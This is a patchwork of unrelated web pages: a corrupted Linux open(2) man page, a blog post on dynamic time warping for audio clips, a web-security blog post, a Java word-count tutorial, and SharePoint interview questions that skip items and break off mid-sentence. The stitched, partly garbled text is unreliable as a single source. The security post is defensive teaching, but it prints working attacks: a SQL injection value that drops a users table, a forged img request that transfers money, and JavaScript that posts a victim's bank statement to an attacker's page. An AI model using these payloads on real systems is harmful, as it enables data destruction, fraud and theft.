open - open and possibly create a file or device #include <sys/types.h> #inclue <sys/stat.h> #include <fcntl.h> int open(const char *pathname, int flags); int open(const char *pathname, int flags, mode_t mode); int creat(const char *pathname, mode_t mode); The open(2). open. SVr4, SVID, POSIX, X/OPEN, BSD 4.3 The O_NOFOLLOW and O_DIRECTORY flags are Linux-specific. One may have to define the _GNU_SOURCE macro to get their definitions. There. read(2), write(2), fcntl(2), close(2), link(2), mknod(2), mount(2), stat(2), umask(2), unlink(2), socket(2), fopen(3), fifo(4) 64 pages link to open(2):
http://wiki.wlug.org.nz/open(2)
CC-MAIN-2015-18
refinedweb
108
69.48
This blog is part 1 of our two-part series Using Dynamic Time Warping and MLflow to Detect Sales Trends. To go to part 2, go to it Dynamic Time Warping The objective of time series comparison methods is to produce a distance metric between two input time series. The similarity or dissimilarity of two-time series is typically calculated by converting the data into vectors and calculating the Euclidean distance between those points in vector space. Dynamic time warping is a seminal time series comparison technique that has been used for speech and word recognition since the 1970s with sound waves as the source; an often cited paper is Dynamic time warping for isolated word recognition based on ordered graph searching techniques. Background This technique can be used not only for pattern matching, but also anomaly detection (e.g. overlap time series between two disjoint time periods to understand if the shape has changed significantly, or to examine outliers). For example, when looking at the red and blue lines in the following graph, note the traditional time series matching (i.e. Euclidean Matching) is extremely restrictive. On the other hand, dynamic time warping allows the two curves to match up evenly even though the X-axes (i.e. time) are not necessarily in sync. Another way is to think of this is as a robust dissimilarity score where a lower number means the series is more similar. Source: Wiki Commons: File:Euclidean_vs_DTW.jpg Two-time series (the base time series and new time series) are considered similar when it is possible to map with function f(x) according to the following rules so as to match the magnitudes using an optimal (warping) path. Sound pattern matching Traditionally, dynamic time warping is applied to audio clips to determine the similarity of those clips. For our example, we will use four different audio clips based on two different quotes from a TV show called The Expanse. There are four audio clips (you can listen to them below but this is not necessary) – three of them (clips 1, 2, and 4) are based on the quote: “Doors and corners, kid. That’s where they get you.” and one clip (clip 3) is the quote “You walk into a room too fast, the room eats you.” Quotes are from The Expanse Below are visualizations using matplotlib of the four audio clips: - Clip 1: This is our base time series based on the quote “Doors and corners, kid. That’s where they get you”. - Clip 2: This is a new time series [v2] based on clip 1 where the intonation and speech pattern is extremely exaggerated. - Clip 3: This is another time series that’s based on the quote “You walk into a room too fast, the room eats you.” with the same intonation and speed as Clip 1. - Clip 4: This is a new time series [v3] based on clip 1 where the intonation and speech pattern is similar to clip 1. The code to read these audio clips and visualize them using matplotlib can be summarized in the following code snippet. from scipy.io import wavfile from matplotlib import pyplot as plt from matplotlib.pyplot import figure # Read stored audio files for comparison fs, data = wavfile.read("/dbfs/folder/clip1.wav") # Set plot style plt.style.use('seaborn-whitegrid') # Create subplots ax = plt.subplot(2, 2, 1) ax.plot(data1, color='#67A0DA') ... # Display created figure fig=plt.show() display(fig) The full code-base can be found in the notebook Dynamic Time Warping Background. As noted below, when the two clips (in this case, clips 1 and 4) have different intonations (amplitude) and latencies for the same quote. If we were to follow a traditional Euclidean matching (per the following graph), even if we were to discount the amplitudes, the timings between the original clip (blue) and the new clip (yellow) do not match. With dynamic time warping, we can shift time to allow for a time series comparison between these two clips. For our time series comparison, we will use the fastdtw PyPi library; the instructions to install PyPi libraries within your Databricks workspace can be found here: Azure | AWS. By using fastdtw, we can quickly calculate the distance between the different time series. from fastdtw import fastdtw # Distance between clip 1 and clip 2 distance = fastdtw(data_clip1, data_clip2)[0] print(“The distance between the two clips is %s” % distance) The full code-base can be found in the notebook Dynamic Time Warping Background. Some quick observations: - As noted in the preceding graph, Clips 1 and 4 have the shortest distance as the audio clips have the same words and intonations - The distance between Clips 1 and 3 is also quite short (though longer than when compared to Clip 4) even though they have different words, they are using the same intonation and speed. - Clips 1 and 2 have the longest distance due to the extremely exaggerated intonation and speed even though they are using the same quote. As you can see, with dynamic time warping, one can ascertain the similarity of two different time series. Now that we have discussed dynamic time warping, let’s apply this use case to detect sales trends.
https://databricks.com/blog/2019/04/30/understanding-dynamic-time-warping.html
CC-MAIN-2019-30
refinedweb
873
59.74
Prepare for Attack!—Making Your Web Applications More Secure Jan 16th, 2007 by thesamet. SQL Injection Attacks The joy of using an ORM like SQLAlchemy or SQLObject—in addition to the benefit of not having to write a single SQL statement yourself—is its ability to protect you from SQL Injection attacks. Although this built-in security measure affords you protection, it is important to understand how SQL injection attacks work. If an application contains code that looks like this… mysql.execute( "SELECT * FROM users WHERE user_id=’%s’" % cherrypy.request.cookies[‘user_id’].value) … …then you are vulnerable to the stinging strikes of a malicious user. That’s because he or she can craft a cookie with the value of "someonebad';. The SQL statement that will be executed will then be: TRUNCATE TABLE users; SELECT '" TRUNCATE TABLE users; SELECT ” …which is not good, not good indeed! To see just how bad the situation really is for our fellows in PHP land, have a look at these Google code search results, or for our little brothers in ASP land, have a look here. Please act responsibly and don’t hack into the sites listed there. Luckily, ORMs escape all the strings we send to the database engine, and as a result, we are protected from this kind of harmful attack. XSRF: Cross-Site Request Forgery This exploit is very common in Web applications, especially in those that provide AJAX API. It is best to describe this type of attack with an example. Suppose that an imaginary project, TGBank (which is a Web interface for a bank), has a send_money() method: def send_money(self, to_whom, how_much): # validate that user has enough money transfer_money( from_user=identity.current.user.user_id, to_user=to_whom, amount=float(how_much)) turbogears.redirect(‘/’) The bank site using this application might contain a page with a “send money” form, where the user fills in information such as to whom he is transferring the money and how much money he is transferring. Everything’s find and dandy there. But what if the user is connected to the bank site, and in another browser tab, he is simultaneously browsing a malicious site, one that contains the following img tag? to_whom=thesamet&how_much=0.04" width="0"> Then the user’s browser will trigger that operation on behalf of the unsuspecting and innocent Web visitor. And because it’s such and inconsequential amount, he probably won’t even bother to check about those four cents. Allowing only POST requests to go into send_money() will not help the matter. That’s because it is easy to send POST requests using Javascript. On the other hand, checking that the HTTP referrer header of the request is within one’s domain is too restrictive. That’s because many browsers often do not send this header. A possible solution is to add a hidden field that only your application can generate and validate. For example, you might consider that the application will process the request only if received a query argument with the value of a sha1 digest of a string that is composed of the user id and a secret word. This string can be easily validated by your application, but it will be hard for a malicious site to generate. Utterly Ridiculous!—More XSRF: Stealing Information with Scriptaculous In addition to doing serious damage, this type of attack can be used to steal information. Suppose the bank application previously mentioned has a URL that returns Javascript code that defines a list with your monthly statement (list of expenses). It may be used on the bank site for doing client side sorting. A malicious site might contain something like this: <script type="text/javascript"> function send_data_to_the_criminal() { /* code that converts the statement object to string goes here */ Ajax.Request(’/collect_other_people_data.php’, postBody=’data=’+statement; } window.onload = send_data_to_the_criminal; </script> Here, that dastardly attacker placed code on his site, that executes the monthly statement script from the bank’s site. Once that script is executed, we have an object named statement containing a list of monthly expenses. Then, after the document finished loading, it is transmitted right into the waiting attacker’s hands. Recently, an XSRF flaw was discovered (and fixed) in GMail. This vulnerability allowed an attacker to steal the user’s contact list precisely as just mentioned. Assault–Take Two! XSS: Cross-Site Scripting Cross-site scripting vulnerability occurs when a Web application generates output that contains user-supplied data without HTML encoding. For example, if we allow a post in a forum to contain HTML tags, then we can use KID to display it: ${XML(forum_post.body)} </div> Raising the ax yet again, a vile attacker can embed javascript code into his post. Then, when an innocent user visits the page, his or her browser runs the script, unbeknownst to him or her. This script can, for example, send the contents of the page back to the attacker. It might also post a comment to a blog, in the unsuspecting user’s name, or make new friends for him or her in MySpace. If we do not use the XML() function in KID, then HTML entities are escaped and we are safe. The users will see just the script text and the browser will not interpret it as code. That said, if XML() is to be used, then it is suggested one check whether the string contains '<script' (case insensitive) before actually sending it. You should also beware of spaces between the script and its surrounding < and >, although I haven’t tested which browsers allow it. Note that most HTML elements allow attributes that can contain javascript code like onmouseover or onclick. The safest thing would be to escape all < to < (Python has a cgi.escape function for this). If HTML tags are to be allowed, then the application should carefully check that they contain only permitted attributes. Also the href attribute of <a> tag should be checked that it does not contain something like “javascript:do_something()”. That way, those malicious attackers can be forced to drop their weapons before they have time to draw them. Now that you’ve learned how to preempt attacks before they strike, you’re well on your way to a more enjoyable Web application development experience. Comments and questions about the strategies outlined here are welcomed. We also encourage suggestions on how you’ve successful waged war against security attackers. I had never understood how XSS actually worked. Thanks for the simple explanation! In the end, you should never allow users to input HTML in your pages. If you really have to, search the input for allowed tags (like <b>, <i>, <em>, etc., remove any unknown attributes in them and replace ‘&’, ‘<’ and ‘>’ in all other places with the escapes ‘&’, ‘<’ and ‘>’ respectively. This sounds like a cool util function for TurboGears > Here, that dastardly attacker placed code on his site, that puts the monthly statement from the bank’s site, inside a DIV. Then, once that data arrives, it is transmitted right into the waiting attacker’s hands. What on earth are you talking about? No browser will allow this sort of cross site scripting. The GMail vunerability was related to the fact that the GMail was returning data as javascript and the script tag doesn’t restrict loading of scripts from other hosts. Really, you should at least test your code before writing blog posts like this. Hi Tom, Thanks for pointing out this inaccuracy. I’ve corrected the example. [...] Nadav Samet has written a simple article explaining various security attacks called Prepare for Attack!—Making Your Web Applications More Secure. [...] Well, you do realise that PHP also escapes all those $_GET and $_POST strings too? It is called Magic Quotes This has been on by default since PHP4 first came out IIRC. Also, in PHP the mysql_query() function will only process a single SQL command. So even supposing you got your SQL injection into the applications listed on that google search, only: SELECT * FROM users WHERE user_id=’someonebad’; Would be sent to the MySQL server. The rest would be thrown away. PHP is reasonably secure on a default install (ie. you have to go out of your way to be insecure). Just a note, magic_quotes are off by default in PHP5 I think. I use them too and I actually find them helpful contrary to what other PHP programmers say. Great article, but I have yet to see an online banking interface that sends sensitive data via JS. Of course, I only really know the ones that I’m using myself, and, in general, you’re right about making sure it’s secure. Jamie: I thought Magic Quotes are considered bad? But you’re right about the single query. Also, as a possible solution for this kind of attacks, couldn’t you just use regexp to search for semicolons outside quotation marks in the sql? Or, for that matter, just escaping quotation marks and escape characters should be fine already. I also wonder, you allow for links in comments on this site, but do you take out a potential inline events such as onclick=”whatever()”, or the old href=”javascript:whatever()”? Hi Matthias, thanks for your comments! It makes sense that the bank will send the data in javascript and the client can plot a graph using this data (with FusionCharts perhaps). Even if it is done over https, the malicious site can use https as well and the user will not be warned. This site runs a standard installation of Wordpress. AFAIK, it removes such things from the comments. (But I still can add malicious code to the posts :). I think Magic Quotes was a good effort to prevent beginner programmers from making the mistake of not escaping input that would end up in a database query. Now, it can be annoying when you end up with slashes all over your incoming data, I agree. But I would rather it was escaping input by default, and it took effort to turn it off (only a couple lines of php). Rather than leaving input unescaped, and making it an effort to escape later (which we know many beginners do not do). Personally, I detect magic quotes at runtime, and if it is on, I reverse it’s escaping mechanism as I have a more elegant solution for my application. But I still see the value of having beginners given at least some basic protection against SQL injections. Now, in PHP6 Magic Quotes will be removed. This is because people should by then (beginners included) be using prepared statements, whereby individual input parameters are escaped as they are passed into an SQL query - so Magic Quotes becomes unnecessary. So I disagree Magic Quotes are a bad thing. [...] Nadav Samet provides a good description of the three major attacks that happen that can be prevented through the code of your web site. Here is the link. [...] [...] 今天看到一篇文章,主要是在談 Web Application 最常見的安全性問題,它主要講了三個重點: [...] Thats not enough. What about onload, onmouseover, … and href=”javascript:…” ? Thanks for pointing this out Marc! I’ve updated the post. This is one of the better articles on online security. Beats those countless sql injection articles that are clearly geared towards newcomers [...] Prepare for Attack!—Making Your Web Applications More Secure · Nadav Samet’s Blog Haz tus aplicaciones web un poco más seguras (tags: web development security javascript sql) [...] [...] Nadav Samet’s Blog » Blog Archive » Prepare for Attack!—Making Your Web Applications More Secu… (tags: security sqlinjection xsrf xss) [...] [...] Prepare for Attack!—Making Your Web Applications More Secure A possible solution is to add a hidden field that only your app can generate and validate, the app will process only if received a query argument with the value of a sha1 digest of a string that is composed of the user id and a secret word… (tags: Security SQL XSRF XSS Scriptaculous) [...] Rendez vos applications web plus sûres… Nadav Samet publie sur son blog un article intéressant faisant un tour d’horizon des failles de sécurités classiques rencontrées dans les applications web……. [...] understand XSS and get to know the most common vulnerabilities have a look at Nadavs site and the Prepare for Attack!—Making Your Web Applications More Secure article. And whats left to say? Never underestimate the risks of tabbed browsing and sessions spread around [...] Nice article. However your blog post is titled “Prepare for Attack!—Making Your Web Applications More Secure”. I don’t see your suggestions of how to prevent those attacks. Frank Hi Frank, Thanks for your comment. Prevention of SQL injection and XSS attacks is straight forward. Never assume that data comes from the web is safe. Even if you think no one will discover a URL which is hidden somehow in your javascript code. User input such as comments or posts should be stripped of all < symbols. And if it is used in SQL statements then it is best to use sql string escaping function like mysql_escape_string in PHP. XSRF attacks can be avoided by not giving sensitive data or allowing any action without making sure the user actually requested it. A prevention technique is described in the article. [...] Nadav Samet has written a simple article explaining various security attacks called Prepare for Attack!—Making Your Web Applications More Secure. [...] [...] Prepare for Attack!—Making Your Web Applications More Secure · Nadav Samet’s Blog (tags: security web) [...] [...] Nicholas Confessore wrote an interesting post today onHere’s a quick excerptArm yourself and prepare for battle! This post is intended as a reminder about the possible security attacks your Web application may be vulnerable to. While it is not meant as a comprehensive guide to Web-application security, … [...] [...] of the three major attacks that happen that can be prevented through the code of your web site. Here is the link. Share and Enjoy: These icons link to social bookmarking sites where readers can share and [...] [...] Prepare for Attack!–Making Your Web Applications More Secure .” [...]
http://www.thesamet.com/blog/2007/01/16/prepare-for-attack%e2%80%94making-your-web-applications-more-secure/
crawl-002
refinedweb
2,327
64.41
I am trying to do some options backtesting. I am finding that the MarketOrder fills for the options is very erratic. Most likely it comes down to the low volume trading that occurs on the options. Anyways, something I ususally do is just assume to lose the spread on every trade execution. For example, when selling an option, you always assume you sell on the bid, and buying you always assume that you buy on the ask. At QuantConnect we have bid/ask data so that seems possible, although I can't quite figure out how I would do the code. From the docs we have this simple example: # Set the fill models in initialize: self.Securities["IBM"].SetFillModel(PartialFillModel()) # Custom fill model implementation stub class PartialFillModel(ImmediateFillModel): def MarketFill(self, asset, order): # Override order event handler and return partial order fills pass So how would I create a default fill model for all options to say that MarketOrders are filled in the way I described above ( selling on bids and buying on asks ) ? The documentation doesn't really explain what we need to return from this function. Would something like this work? # Custom fill model implementation stub class MyCustomFillModel(ImmediateFillModel): def MarketFill(self, asset, order): if order.isSell: order.fillPrice = asset.BidPrice else: order.fillPrice = asset.AskPrice return order I know that attributes of the order object are wrong but I can't find any documentation explaining the order object and which attributes we are supposed to override in the fill model. Please help. Thanks.
https://www.quantconnect.com/forum/discussion/2990/setting-custom-market-order-fill-model-for-options/*
CC-MAIN-2019-18
refinedweb
256
52.8
AWS Cloud Operations & Migrations Blog to be monitored. “Incidents” are both known and unknown events that disrupt your applications’ performance and resiliency, and can negatively impact your business. With Amazon CloudWatch, you can monitor your application workloads, create alarms, set thresholds for alarms, and even create self-mitigating responses or send notifications in near-real time to your operations team. In this post, we discuss in detail alarms, incident management, and remediation. What is an incident and why is it important? According to the Information Technology Infrastructure Library (ITIL), an incident is an “an unplanned interruption to an IT service or reduction in the quality of an IT service.” Many of us have experienced such issues where the pager goes off in the early morning hours, confusion ensues about whether the incident is negatively impacting your customers, and management is demanding answers from those trying to piece together the evidence trail to identify the root cause and bring the service back to a stable operating state. Such incidents aren’t fun for anyone. It’s important to understand what kinds of issues cause these incidents. When you understand the root cause, you can monitor, alert, and mitigate quickly to minimize the duration of the disruption. Here is a small list of examples: - Code deployments – In the cloud, this process is now two-fold. A deployment gone wrong could potentially affect either the infrastructure or the software running on the infrastructure. With IaC, someone might set up the autoscaling group of a service with a maximum that’s too low, causing the system to stall when load goes above normal because it can’t scale to take the increased traffic. With a software deployment, you could be deploying new code that can’t process a particular data attribute or type because your testing framework didn’t account for it, so the application throws an exception and doesn’t process the data as expected. - Software issues in running workloads – These software-related issues aren’t caused by a recent deployment but by something else, such as a memory leak or a software bug based on an unknown condition. Ideally these are caught in testing, but they do happen. - Infrastructure issues – Infrastructure outages can occur due to manual configuration errors such as network settings modifications or hardware failures. CloudWatch provides monitoring for AWS resources for metrics like Amazon Elastic Compute Cloud (Amazon EC2) instance CPU, network I/O, and more. These baseline metrics are often enough to help get your application workloads enterprise- ready, but you can add more metric collections if needed, such as application-specific metrics. You can configure Amazon EC2 Auto Scaling to use CPU metrics to determine when the autoscaler needs to scale out the number of instances to meet the workloads requirement. You can also use it to scale in when the CPU utilization drops. However, what if you wanted to use a different metric, such as number of connections, or queue depth, which are not included in CloudWatch by default. CloudWatch allows you to push custom metrics specific to your application workload needs. For more information, see How to better monitor your custom application metrics using Amazon CloudWatch Agent. Creating alarms and setting thresholds When you’re collecting the metrics you need from your application workload in CloudWatch, you need to determine what you want to alarm on. When to alarm is an important decision: you are effectively saying, “The system has hit a problem that someone should know about.” If you alarm too much and too often, alarms tend to get ignored – the exact opposite of what you want. If one important alarm is lost in a sea of less-critical alarms, a service disruption could go on longer than required and have a negative impact on your business. When you create an alarm, you first select a metric. Keep three key concepts in mind: - The threshold for the alarm – For instance, setting an Amazon EC2 Auto Scaling event to scale out when CPU utilization exceeds 90% may be too high, because you may not be able to get new resources started in time before the CPU saturates at 100%. On the other hand, setting the scale-out event at 50% CPU utilization may be too low, causing more resources to be added when the CPU would have only increased to 65%, which the workload would have handled without needing a scale-out event. - The statistic you’re measuring – This statistic defines if you’re looking at the metric in question as an average value, summed value, a maximum value, a minimum value, a P90 value, or a sample count. Looking at the metric value with different types of statistical variance gives you more flexibility in setting alarms. For instance, percentiles are very powerful in making good approximations and can provide insights into the consistency of your applications’ response time compared to that of an average. - The period, threshold, and data points to alarm – Understanding how these features work together helps make sure that you don’t over-alarm, and that the system has a chance to self-heal before an alarm is triggered. In the following use case, I have an application that uses an Amazon Simple Queue Service (Amazon SQS) queue and I want to alarm when the total number of visible messages (ready-to-be-processed messages) exceeds 1 million. From both testing and early production data, we know that the queue usually has no more than 100,000 messages. - On the CloudWatch console, choose Create alarm. - Choose the metric SQS namespace. - For Metric name, enter ApproximateNumberOfMessageVisible. - For QueueName, enter a name. - For Statistic, choose Average (Max may also be appropriate). - For Period, choose 5 minutes. - For Threshold type, select Static. - Select Greater. - For Define the threshold value, enter 1000000. - Under Additional configuration, set Datapoints to alarm to 3 out of 3. The Datapoints to alarm configuration allows you to create a soft vs. hard state before the alarm is triggered and action is taken. For this use case, if the queue is greater than 1 million messages in the first 5-minute period, the alarm sees it but doesn’t act. If in the next 5-minute period it’s still over 1 million messages, it sees it but still doesn’t act. If in the third 5-minute period the messages are still more than 1 million, the alarm changes from a soft to a hard alarm state because it saw three consecutive alarm criteria met. In essence, this means that the issue must be an issue for three consecutive periods or 15 minutes. Thinking of this another way, if in the first 5-minute period there were over 1 million messages in the queue and it alarmed, but in the next 5-minute period the consumers of the messages had already processed a third of the queue, the alarm would have been sent out prematurely and the operations person who woke up at 3:00 AM to check to the queue would see that the problem had resolved itself, and would be less interested in responding to any future 3:00 AM queue depth pages. The following graph illustrates the threshold changing over time. That doesn’t mean, however, that all alarms require action. Sometimes, you may just want to send a notification for informational purposes; other times you may want to send a notification that requires manual intervention. These are some of the criteria between a critical alarm vs. informational alarms. In our use case, if our queue reaches a depth of 1 million messages, I want a notification to be sent to the operations email distribution list. This is strictly informational, to make aware that at times we are greatly over our normal message counts. Informational notifications can provide clues on new trends and changes, such as the growing popularity of your product in another part of the world, and help reset the threshold before an outage actually occurs. With CloudWatch, you can also combine alarms into a single composite alarm. This allows you to monitor the health of a larger ecosystem such as a web application, a large scale workload, a Region, or even Availability Zones by reducing the number of alarms associated with the resources that make up the ecosystem. For more information, see Improve monitoring efficiency using Amazon CloudWatch Composite Alarms. Another way to monitor metrics that finds changes in normal behavior and learns from it is to incorporate AI or machine learning into your monitoring, as introduced in CloudWatch earlier this year with Anomaly Detection. For more information, see How to set up CloudWatch Anomaly Detection to set dynamic alarms, automate actions, and drive online sales. Types of actions to take based on alarm state It’s important not only to trigger alarms for the right reasons , but also to is take actions based on alarms. Each alarm you configure triggers once per the criteria you set. In our use case of the queue, it triggers when three consecutive alarms are triggered three consecutive times, and then triggers again when another three consecutive occurrences are captured. What can you do with these alarms? What is the right action to take? Notifications are a good place to start. With an alarm that has triggered the alarm state, you can set the alarm to send a notification to an Amazon Simple Notification Service (Amazon SNS) topic. This allows you to create subscriptions based on the topic. For this use case, I trigger an alarm and send an informational email any time the message queue has over 1 million visible messages. The following screenshot shows the configuration of this notification. Here in the below screenshot, you can see that we have chosen “In alarm” option and selected the “Select an existing SNS topic” option to send notifications to the SNS topic on the account. The OpsTeamInfoAlarm@example.com address receives the email but they aren’t paged. How do I page when there is a critical alarm? In this use case, I’m monitoring the APIs of my microservices and I find that one of my microservices or health-check API endpoints has been down two consecutive times over 10 minutes, which matches the alarm state of the CloudWatch alarm for that service. Someone needs to be alerted to investigate and hopefully restore the microservice to health. You can send text messages to the on-call team or integrate with a tool like PagerDuty to page them. SMS text notifications To send a text message, create an SNS topic. Then create a subscription and for Protocol, choose SMS and enter the phone number to text. Make sure the SMS is available in your Region and be aware that you may need to request a raise in SMS limits. PagerDuty integration To integrate with PagerDuty, you must be signed up as a PagerDuty customer. PagerDuty has released custom integrations with CloudWatch for both SNS topics and CloudWatch Events. If you follow the PagerDuty integration procedure, you can have your alarms sent to PagerDuty and to the pagers of your on-call staff. Slack channel notification Many teams communicate in Slack channels because they’re an excellent way to create and communicate in virtual conference rooms when people aren’t sitting near each other or the gear that they are administering or operating. To post CloudWatch alarm data to a Slack channel: - Configure the alarm to forward the details to an SNS topic (as for email or SMS text). - In the AWS Management Console, navigate to AWS Chatbot. - Choose Configure a chat client. - For Chat client, choose Slack. - Choose Configure client. - In the top right corner of the next page, choose Sign in to another workspace or choose the workspace you are already signed in to. - Read the details on permissions and choose Allow. - In the Configuration settings of the workspace, you can choose to publish logs to CloudWatch Logs. For this use case, I select Errors only. - For Channel type, I select Public and enter the channel name announcements. You need to give the chatbot an AWS Identity and Access Management (IAM) role. You can use one that you already created, but you need to make sure that you modify it for AWS Chatbot to use. - Configure the chatbot by choosing an SNS topic in the Region you chose. - Choose Save. The chatbot is now subscribed to the SNS topic, which your alarm is configured to send details to when triggered. Did it work? The following screenshot shows the alarm messaging the ops team Slack channel. AWS Chatbot can only receive events from the SNS topic from supported AWS services. If you send a notification event from a non-supported AWS service to your SNS topic, it doesn’t forward the published SNS message to your Slack channel. In the chatbot setup above, I selected to publish errors to CloudWatch Logs. The following screenshot shows a message in CloudWatch Logs intended for my Slack channel but published to SNS from an unsupported service. As described in the error message, “Event received is not supported” because I simply published a message directly to the SNS topic from the console. For more information about setting up AWS Chatbot with Slack, see Test notifications from AWS services to Amazon Chime or Slack chat rooms. Automation with Auto-Scaling As discussed earlier, you may use your monitoring and metrics to drive autoscaling events such as scaling out or out Amazon EC2 resources, as well as ECS containers. - When configuring the CloudWatch alarm, in the Auto Scaling section, for Alarm state trigger, select In alarm. - For Resource type, select EC2 Auto Scaling group or ECS Service. - For Select a service, choose your service. - For Take the following action… choose the action to take. Automation with AWS Lambda AWS Lambda is a great way to remediate incidents that occur based on your alarms. For instance, in this example, you’re monitoring your microservices API that is behind an Application Load Balancer, traffic can’t reach the microservice, so it times out. You could have an alarm triggered to send an SNS notification to a topic to which a Lambda function is subscribed so it runs a describe-security-groups —group-name microserviceXYZ command to validate that the ports are still open for the load balancer. If not, it could issue a command to open them. The integration is very similar to that of the Slack integration, but instead of a message being posted in a Slack channel, it automatically fixes the issue. The following diagram illustrates this architecture. Here we have an alarm configured which will trigger a notification to SNS. This invokes a Lambda function which in-turn makes changes to the security group in question. Alarm prioritization There are times when you may want the first occurrence of an alarm being triggered to be informational, the second to notify your operations teams to take action, and the third time to escalate to senior leadership. CloudWatch doesn’t dictate the prioritization of any alarms that you create, but these requirements can be met based on your configuration of the alarms. The easiest way to achieve this is to create multiple alarms for the same metric, with different thresholds for each alarm. For instance, if you have a microservice that takes orders and processes them, you can create a custom metric in CloudWatch that reports on the service’s latency each time it called. For the lowest-priority alarm (notification to email or operations Slack channel), you create an alarm that looks at the average latency every 5 minutes and alarms if the latency is greater than 300 milliseconds for two consecutive periods (10 minutes). For the medium level of priority (page the on-call of the operations team), you create an alarm that watches the same latency metric but looks for a threshold greater than 500 milliseconds for three consecutive periods (15 minutes). Finally, the escalation email to senior leadership might be an alarm watching the same metric with a threshold greater than 1 second of latency for three consecutive periods (15 minutes). Each alarm is watching the same metric but looking for different thresholds over different consecutive periods. If all three alarms trigger during a hypothetical outage of the process orders microservice, the first alert sequence might look like the following timeline which shows all the alarms getting triggered sequentially However, because each alarm’s threshold of the same metric is set distinct from the others, you will continue to receive lower-priority alerts during an outage even after the medium or higher alerts are triggered, because the threshold for the lower alarm is still being met (a medium alert of 500 milliseconds for 15 minutes is still greater than the threshold of 300 milliseconds for 10 minutes). In this graphic however, you can see that if the rising latency isn’t mitigated when the lowest-priority alarm is triggered, the medium-priority alarm is triggered. Again, if the service disruption isn’t mitigated by the actions taken by the medium-priority alarm and latency continues to rise, the high-priority alarm is triggered with notifications and a call to action from senior leadership. Summary As you begin workload migration to the cloud, monitoring and operational excellence can be a key factor in determining your workload’s success. You can use CloudWatch to create custom metrics and alarms on metrics to help illustrate things like access patterns, performance patterns, scale-out and scale-in thresholds, and response to incidents. CloudWatch offers integrations to keep your DevOps teams informed via email, SMS text messages, and their accustomed collaborative tools such as Slack or Amazon Chime. You can set alarms at different levels to allow different actions based on different levels of alerting priority (e.g., informative only, automated remediation, and executive notification). About the Author Eric Scholz is a Principal Solutions Architect at Amazon Web Services. He enjoys helping customers build solutions to overcome technical challenges and in his off time, you can usually find Eric doing outdoors activities with his family while also dabbling on personal projects like building cars and 3d printing.
https://aws.amazon.com/blogs/mt/alarms-incident-management-and-remediation-in-the-cloud-with-amazon-cloudwatch/
CC-MAIN-2022-27
refinedweb
3,031
50.16
How to count the number of words in a string in Java This tutorial consists of two ways to count the number of words in a string in Java: - Using a String Tokenizer class. - Using the CommandLine itself. StringTokenizer Class What is this StringTokenizer class? StringTokenizer is a class whose object tokenizes a given String. A StringTokenizer class can have up to three constructors: - String: The string which is to be tokenized. - delim: which are delimiters(such as space, tab etc.) which tokenizes the given String. - flag: if the flag is false, delimiters are used to separate the tokens, or if the flag is true, delimiters are themselves considered as tokens. In the code given down below, a WordsInAString class has a single String, which is passed as it’s the constructor. The class has one stringLength( ) method which calculates the number of words in the String. At first, we create a StringTokenizer class. A variable identified as length holds the number of words in the String. The countTokens( ) method is a method in StringTokenizer class which counts the number of tokens in the String, keeping in account the type of delimiters used. In this code, no delim parameter is used in the countTokens( ) method and hence the delimiter used by the StringTokenizer class is the default space or tab. The length is then printed. The code for the problem is as follows : Count the number of words in a string in Java import java.util.Scanner; import java.util.StringTokenizer; public class WordsInAString{ String str; public WordsInAString(String str){ this.str = str; } public void stringLength(){ if(str.isEmpty()||str == null){ System.out.println("There are no words in the sentence.\n"); } else{ StringTokenizer words = new StringTokenizer(str); //StringTokenizer class object is created int length = words.countTokens(); //countTokens() method counts the number of words System.out.println("There are "+length+" words in the Sentence."); //print the length } } } class Test{ public static void main(String args[]){ Scanner s = new Scanner(System.in); String input; System.out.println("\nEnter a String."); input = s.nextLine(); WordsInAString w = new WordsInAString(input); w.stringLength(); } } A single line of input is given which contains the String. The output is the number of words in the String. Output Enter a String. Welcome to codespeedy There are 3 words in the sentence. Using Command-Line Input: Count the number of words in a string The command-line technique is rather a very simple technique of calculating the number of words in the sentence. It uses the String arguments passed in the main method. For example: If the input string is Welcome to codespeedy, args[0] gets assigned with Welcome, args[1] gets assigned with to and args[2] gets assigned with codespeedy. Hence when args.length( ) function is called, it returns the number of words in the String. Code import java.util.*; public class WordsInAString { public static void main(String[] args){ System.out.println("The sentence has " + args.length + " words"); } } Output After compilation of the .java file in command-line, the .class file is created. Now when executing this class file, the general syntax followed is java <classname> . The String input is given at the time of executing this class file itself as java <classname> Welcome to codespeedy . Hence, the output will be : The sentence has 3 words So that’s all in this tutorial. All the best! Also Read: An Object Oriented Approach of using Math.addExact( ) method in Java
https://www.codespeedy.com/how-to-count-the-number-of-words-in-a-string-in-java/
CC-MAIN-2020-29
refinedweb
573
68.97
Introduction To SharePoint Interview Questions And Answers SharePoint provides a protractible platform that has a dimension of products that provide a business solution to organizations as per various needs. SharePoint is useful for creating websites. SharePoint helps in bringing important information at one place from different data sources. SharePoint helps to communicate network and make sure it collaborate with different people. So if you have finally found your dream job in SharePoint but are wondering how to crack the interview and what could be the probable 2020 SharePoint Interview Questions. Every interview is different and the scope of a job is different too. Keeping this in mind we have designed the most common SharePoint Interview Questions and answers to help you get success in your interview. Here are the top ten most asked 2020 SharePoint Interview Questions And Answers. These top interview questions are divided into two parts are as follows: Part 1 – SharePoint Interview Questions And Answers (Basic) This first part covers: - SharePoint Sites is useful for creating websites. - Insights act as a tool which brings all information together from different data sources. - SharePoint Communicates helps in networking and collaborating with different people. - Search helps in providing efficient and quick information and the contents of an enterprise. - Contents act as a perfect Content Management System. - Lastly, Composition assists in using different tools and capabilities together. 2. What is the latest version of SharePoint and explain its main features in brief? Answer: The latest version of SharePoint is SharePoint 2013. The main features of it are that it an older version that were having performance issues but now have been improved like distributed Cache service, minimal download strategy, and shredded storage. 3. Explain the terms: Site template, Site definition, and ONET.xml. Answer: The site template helps in providing a basic template and layout of a new site that is to be created in SharePoint. The design information contains information about a site which includes: - List which is to be a part of the site - Site content like document libraries - The themes and borders which is to be used on the site - Web part pages which will be used in the site In addition to it, it allows other applications of SharePoint to be instantiated whenever required. The site definition mainly is a collection of XML or ASPX files that elements are taken by SharePoint Handler object and they are loaded in the environment properly. The file, in general, contains assembly name, namespace, public key token numeric, type name and safe declaration. The items that are not loaded in the environment properly will throw an error. Part 2 – SharePoint Interview Questions And Answers (Advanced) Let us now have a look at the advanced Interview Questions. 6. What are SPSite and SPWeb? Explain the difference between them. Answer: SPSite is a site collection and is represented in an object model. It is the object where we start working with a server object model. It is most frequently used in SharePoint application development. SPWeb, on the other hand, is a site under site collection in SharePoint. It is referred to as the SPWeb class in the SharePoint list. 8. What is GAC in SharePoint? Answer: The Global Assembly 